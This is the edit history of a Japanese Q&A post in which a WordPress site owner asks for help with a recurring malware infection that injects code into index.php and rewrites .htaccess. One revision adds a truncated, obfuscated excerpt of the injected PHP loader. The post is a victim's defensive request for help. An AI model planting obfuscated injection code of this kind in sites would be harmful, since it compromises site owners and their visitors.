質問編集履歴
2
title
CHANGED
|
File without changes
|
body
CHANGED
|
@@ -1,12 +1,10 @@
|
|
|
1
1
|
wordpressのサイトがマルウェア感染しました。
|
|
2
|
-
対象サイトhttp://howto-taiwan.com/
|
|
3
2
|
|
|
4
3
|
有害サイトへリダイレクト、不自然なファイルは削除しましたがまだ現状復帰には至っていません。
|
|
5
4
|
なにか確認すべきポイント、サーバー上のファイルなどがあればご教示願います。
|
|
6
5
|
|
|
7
6
|
#現状
|
|
8
7
|
現状としてはindex.phpへコードの挿入と.htaccessが勝手に書き換えられてアクセスできなくなってしまいます。
|
|
9
|
-
http://howto-taiwan.com/wp-admin/
|
|
10
8
|
|
|
11
9
|
index.phpの挿入コードと.htacessをサーバーから初期化すれば一度ログインできますが、半日ほどたつとまた書き換えられてログインできなくなってしまいます。
|
|
12
10
|
|
1
挿入コード追加
title
CHANGED
|
File without changes
|
body
CHANGED
|
@@ -10,6 +10,12 @@
|
|
|
10
10
|
|
|
11
11
|
index.phpの挿入コードと.htacessをサーバーから初期化すれば一度ログインできますが、半日ほどたつとまた書き換えられてログインできなくなってしまいます。
|
|
12
12
|
|
|
13
|
+
###index.phpへ挿入コード(長過ぎるので抜粋、文字列は毎回変わります。)
|
|
14
|
+
<?php
|
|
15
|
+
$O00O__0O_='wacHsRz0gczDso1vjLnzaMlwbNyD7kotgYp2uga0pL9XfY3zuLjm6dpp5Z7XfJ3x9d3W5V6lqbni95mj8b22x0n=';
|
|
16
|
+
$O0_O0OO__=urldecod("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B64%($O00O__0OO_);?>
|
|
17
|
+
```
|
|
18
|
+
|
|
13
19
|
##アドバイスして頂きたい点
|
|
14
20
|
確認すべきポイント、サーバー上のファイル、マルウェアスキャンツール
|
|
15
21
|
|